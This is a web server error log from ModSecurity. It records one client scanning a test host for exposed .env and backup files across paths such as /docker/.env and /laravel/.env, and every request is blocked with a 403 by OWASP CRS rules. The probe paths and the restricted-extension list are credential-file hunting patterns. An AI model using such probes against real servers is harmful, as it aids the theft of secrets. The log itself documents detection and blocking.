[Thu Feb 26 02:07:48.949745 2026] [:error] [pid 2330791] [client 195.178.110.33:51256] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aZ-c5A3HqGC30X9HPoEn6gAAAAM"]
[Thu Feb 26 02:07:48.949976 2026] [:error] [pid 2330791] [client 195.178.110.33:51256] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aZ-c5A3HqGC30X9HPoEn6gAAAAM"]
[Thu Feb 26 02:07:48.950129 2026] [:error] [pid 2330791] [client 195.178.110.33:51256] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aZ-c5A3HqGC30X9HPoEn6gAAAAM"]
[Thu Feb 26 02:07:49.124814 2026] [:error] [pid 2330792] [client 195.178.110.33:51260] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aZ-c5Tf0JOOqB-ib2UlJ5gAAAAQ"]
[Thu Feb 26 02:07:49.125075 2026] [:error] [pid 2330792] [client 195.178.110.33:51260] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aZ-c5Tf0JOOqB-ib2UlJ5gAAAAQ"]
[Thu Feb 26 02:07:49.125244 2026] [:error] [pid 2330792] [client 195.178.110.33:51260] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aZ-c5Tf0JOOqB-ib2UlJ5gAAAAQ"]
[Thu Feb 26 02:07:49.217420 2026] [:error] [pid 2330792] [client 195.178.110.33:51260] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aZ-c5Tf0JOOqB-ib2UlJ5wAAAAQ"]
[Thu Feb 26 02:07:49.217641 2026] [:error] [pid 2330792] [client 195.178.110.33:51260] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aZ-c5Tf0JOOqB-ib2UlJ5wAAAAQ"]
[Thu Feb 26 02:07:49.217817 2026] [:error] [pid 2330792] [client 195.178.110.33:51260] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aZ-c5Tf0JOOqB-ib2UlJ5wAAAAQ"]
[Thu Feb 26 02:07:50.538752 2026] [:error] [pid 2330792] [client 195.178.110.33:51260] [client 195.178.110.33] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aZ-c5jf0JOOqB-ib2UlJ6AAAAAQ"]
[Thu Feb 26 02:07:50.539077 2026] [:error] [pid 2330792] [client 195.178.110.33:51260] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aZ-c5jf0JOOqB-ib2UlJ6AAAAAQ"]
[Thu Feb 26 02:07:50.539260 2026] [:error] [pid 2330792] [client 195.178.110.33:51260] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aZ-c5jf0JOOqB-ib2UlJ6AAAAAQ"]
[Thu Feb 26 02:08:03.653503 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn9gAAAAI"]
[Thu Feb 26 02:08:03.653731 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn9gAAAAI"]
[Thu Feb 26 02:08:03.653924 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn9gAAAAI"]
[Thu Feb 26 02:08:03.704438 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn9wAAAAI"]
[Thu Feb 26 02:08:03.704666 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn9wAAAAI"]
[Thu Feb 26 02:08:03.704849 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn9wAAAAI"]
[Thu Feb 26 02:08:03.748672 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn-AAAAAI"]
[Thu Feb 26 02:08:03.748905 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn-AAAAAI"]
[Thu Feb 26 02:08:03.749120 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn-AAAAAI"]
[Thu Feb 26 02:08:03.790317 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn-QAAAAI"]
[Thu Feb 26 02:08:03.790604 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn-QAAAAI"]
[Thu Feb 26 02:08:03.790811 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn-QAAAAI"]
[Thu Feb 26 02:08:03.855665 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn-gAAAAI"]
[Thu Feb 26 02:08:03.855895 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn-gAAAAI"]
[Thu Feb 26 02:08:03.856086 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn-gAAAAI"]
[Thu Feb 26 02:08:03.902406 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn-wAAAAI"]
[Thu Feb 26 02:08:03.902642 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn-wAAAAI"]
[Thu Feb 26 02:08:03.902825 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn-wAAAAI"]
[Thu Feb 26 02:08:03.956196 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn_AAAAAI"]
[Thu Feb 26 02:08:03.956423 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn_AAAAAI"]
[Thu Feb 26 02:08:03.956611 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aZ-c84Cbt-ue5ARpbmjn_AAAAAI"]
[Thu Feb 26 02:08:04.014431 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aZ-c9ICbt-ue5ARpbmjn_QAAAAI"]
[Thu Feb 26 02:08:04.014666 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aZ-c9ICbt-ue5ARpbmjn_QAAAAI"]
[Thu Feb 26 02:08:04.014866 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aZ-c9ICbt-ue5ARpbmjn_QAAAAI"]
[Thu Feb 26 02:08:04.065229 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aZ-c9ICbt-ue5ARpbmjn_gAAAAI"]
[Thu Feb 26 02:08:04.065495 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aZ-c9ICbt-ue5ARpbmjn_gAAAAI"]
[Thu Feb 26 02:08:04.065672 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aZ-c9ICbt-ue5ARpbmjn_gAAAAI"]
